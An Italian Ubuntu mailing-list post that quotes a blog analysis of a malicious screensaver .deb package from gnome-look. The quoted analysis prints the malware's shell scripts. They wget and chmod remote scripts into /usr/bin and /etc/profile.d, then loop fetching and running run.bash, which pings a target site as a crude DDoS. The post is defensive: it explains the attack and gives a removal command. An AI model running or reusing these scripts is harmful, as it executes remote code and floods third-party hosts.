[ubuntu-it] Stampante in rete

sandro quanet a tin.it
Ven 11 Dic 2009 14:55:14 GMT 

Il giorno Fri, 11 Dec 2009 15:45:37 +0100
Felix <lccflc a email.it> ha scritto:


> >
> > Il problema č che non ha senso che si permettano pacchetti .deb nel
> > sito gnome-look. La maggior parte infatti dei download non sono deb
> > e cosė dovrebbe essere; dovrebbero proibire i deb a favore di
> > procedure di importazione degli add-on grafici... IMHO
> >
> > Ciao
> >
> > Piviul
> 
> 'Azz... allora č vero =-O
> 
Riporto da un post su linuxfeed:
(scusate, un po' lunga)

Questo simpatico codice malevolo non faceva altro che scaricare degli
script in bash ed eseguirli. Alcuni di questi script a loro volta
scaricavano altri script, e il cuore di questo malware era un minuscolo
script in bash run.bash che faceva un ping a un sito.

Il primo script (contenuto nel file .DEB dello screensaver) aveva
questo contenuto:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo —————–
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo —————–
clear
exit
Il file scaricato da questo codice era Auto.bash (il contenuto di
gnome.sh non lo conosco), che conteneva:

while :
do
rm /usr/bin/run.bash
cd /usr/bin/
wget http://05748.t35.com/Bots/index.php
wget http://05748.t35.com/Bots/run.bash
sleep 4
rm index.php
chmod 755 run.bash
command -p /usr/bin/run.bash
done
A sua volta scaricava index.php:

<!-- T35 Hosting Ad Code Begin -->
<style type="text/css">
#t35ad{font: 14px  arial,helvetica; text-decoration: none;
line-height:1.5em; text-align: center; } #t35ad a{font: 14px
arial,helvetica; text-decoration: none; } #t35ad
a:hover{background-color: black; color: white; font-size:medium;
font-weight: bold; } #t35ad ul{display: inline; list-style-type: none;
padding: 0;} #navlist li{display: inline; list-style-type: none;
padding-right: 0px; padding-left: 0px; padding: 0;} </style> <script
type="text/javascript" charset="utf-8"> var redvase_ad = { version:
1.5 }; redvase_ad.publisher = 't35';
  redvase_ad.kind      = 't35_footer_prem';
  redvase_ad.content   = 'creative'
  </script>
<script src="http://redvase.bravenet.com/javascripts/redvase.js"
type="text/javascript" charset="utf-8"></script> <!-- T35 Hosting Ad
Code End --> 

</noscript></noframes>
<!-- T35 Hosting Ad Code Begin -->
<!-- Start of Stat Code -->
<img src="http://c11.statcounter.com/1120767/0/78e6f3a5/1/" width="1"
height="1" alt="stats" border="0" /> <script type="text/javascript">
_qoptions={
qacct:"p-f2Rp-GHnsAESA"
};
</script><script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script> <noscript><img
src="http://pixel.quantserve.com/pixel/p-f2Rp-GHnsAESA.gif"
style="display: none;" border="0" height="1" width="1"
alt="Quantcast"/></noscript> <!-- End of Stat Code --> <div id="t35ad"
align="center" style="display:block;"> <br/>Hosted by <a
target="_blank" href="http://www.t35.com/">T35 Free Web Hosting</a>. <a
target=_blank href=http://www.saharamakeup.co.uk/>Indian Bridal
Makeup</a>&nbsp;-&nbsp;<a target=_blank
href=http://www.hypercasinos.com/component/option,com_jreviews/Itemid,28/>Casino
Reviews</a>&nbsp;-&nbsp;<a target=_blank
href=http://www.www.mckennavw.com/>VW Los Angeles</a>&nbsp;-&nbsp;<a
target="_blank" href="http://www.drugrehabcenter.com/">Drug
Rehab</a>&nbsp;-&nbsp;<a target=_blank
href=http://www.bestonlinecollegesdegrees.com/college-degrees-online.html>Online
Degree</a>&nbsp;-&nbsp;<a target=_blank
href=http://www.uk-cheapest.co.uk>Domains</a>&nbsp;-&nbsp;<a
target=_blank href=http://www.fashiondrops.com/>Prada
Shoes</a>&nbsp;-&nbsp;<a target=_blank
href=http://www.thelabdesign.com/organic-seo.html>SEO Los Angeles</a>
</div> e il file run.bash, il quale infine conteneva questo:

ping -s 65507 www.mmowned.com
Un semplice ping ad un sito. Nessun danno al sistema nel quale questi
script agivano, e in pratica nessun danno neppure al server che
ospitava il sito a cui era indirizzato l’attacco. Infatti tutto questo
per potersi tradurre in un vero attacco DDoS necessiterebbe di un
grande numero di macchine (botnet) che effettuano contemporaneamente il
ping. Numero che difficilmente puo’ essere raggiunto in questo modo,
infatti serve qualcosa di piu’ “attraente” di un semplice screensaver
con una cascata.

La cosa interessante e’ che il codice malevolo era molto semplice,
troppo semplice, quindi chiunque poteva accorgersi di quel che faceva
semplicemente dandogli un’occhiata, in piu’ era fatto in modo che
l’autore potesse cambiare il tipo di attacco o il bersaglio
semplicemente modificando gli script contenuti nel sito
http://05748.t35.com/. In questo modo poteva perfino arrecare qualche
danno direttamente a chi aveva installato lo screensaver
(fortunatamente per loro questo non e’ avvenuto, o non c’e’ stato il
tempo). Il che sarebbe stato anche piu’ logico, perche’ piu’ efficace
di un improbabile DDoS.

Tirando le somme dunque le ipotesi sono due:

l’autore del malware e’ uno alle prime armi convinto di poter fare un
attacco del genere con una mini botnet; l’autore del malware voleva
vedere o dimostrare quanto sono diventati imprudenti gli utenti
GNU/Linux; Io propendo per la seconda ipotesi, sarebbe piu’ sensata,
perche’ se avesse voluto veramente fare un attacco DDoS, gli sarebbe
convenuto puntare su Windows, che conta un infinitamente maggiore
numero di macchine. Questa seconda ipotesi tra l’altro, sarebbe anche
compatibile con una mia idea, ossia che ci sia chi sta’ sondando il
terreno per vedere di quanto e’ sceso il livello medio di “accortezza”
degli utenti GNU/Linux e se sia possibile (utile per loro) elaborare
qualche malware, virus o altro.

Chi avesse installato lo screensaver incriminato deve rimuoverlo, o si
va a cercare i file da cancellare o da’ questo comando (che ho trovato
e di cui non assicuro l’efficacia): $ sudo rm
-f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh
index.php run.bash && sudo dpkg -r app5552 ovviamente se non avete
installato lo screensaver di cui si sta’ scrivendo non siate cosi’
sciocchi da usare il codice qui sopra.

E’ gia’ stato trovato un altro screensaver sempre con contenuto
malevolo, dunque come sempre, leggiamo bene prima di installare quello
che ci capita.

Tutto questo ci insegna una cosa semplice semplice, ma di grande
utilita’. Se volete installare qualcosa assicuratevi prima che sia
sicura, il fatto che il codice sia aperto permette di farlo [1]. Se
volete rischiare lo stesso ed installarvi ogni porcheria senza prima
leggerne il contenuto, siete liberi di farlo, ma poi non lamentatevi
dicendo che GNU/Linux non e’ sicuro. Inutile dare la colpa a Gnome-Look
per non aver controllato il contenuto del file .DEB, non credo sia
possibile chiedere ad un servizio gratuito che permette a tutti di
caricare i loro lavori e scaricare quelli degli altri di controllare
ogni singolo file. Magari sulla questione della sicurezza su GNU/Linux
ci tornero’ in un prossimo post.

[1] Se e’ cosi’ facile che un utente cada nel tranello con un file con
codice aperto, mi chiedo cosa succeda con i file binari. [^]

** fine del post da linuxfeed **


-- 
aspex - http://www.majaglug.net
GNU/Linux-Logix 2.6.31
Linux User #499691
Linux Machine #411617

Maggiori informazioni sulla lista ubuntu-it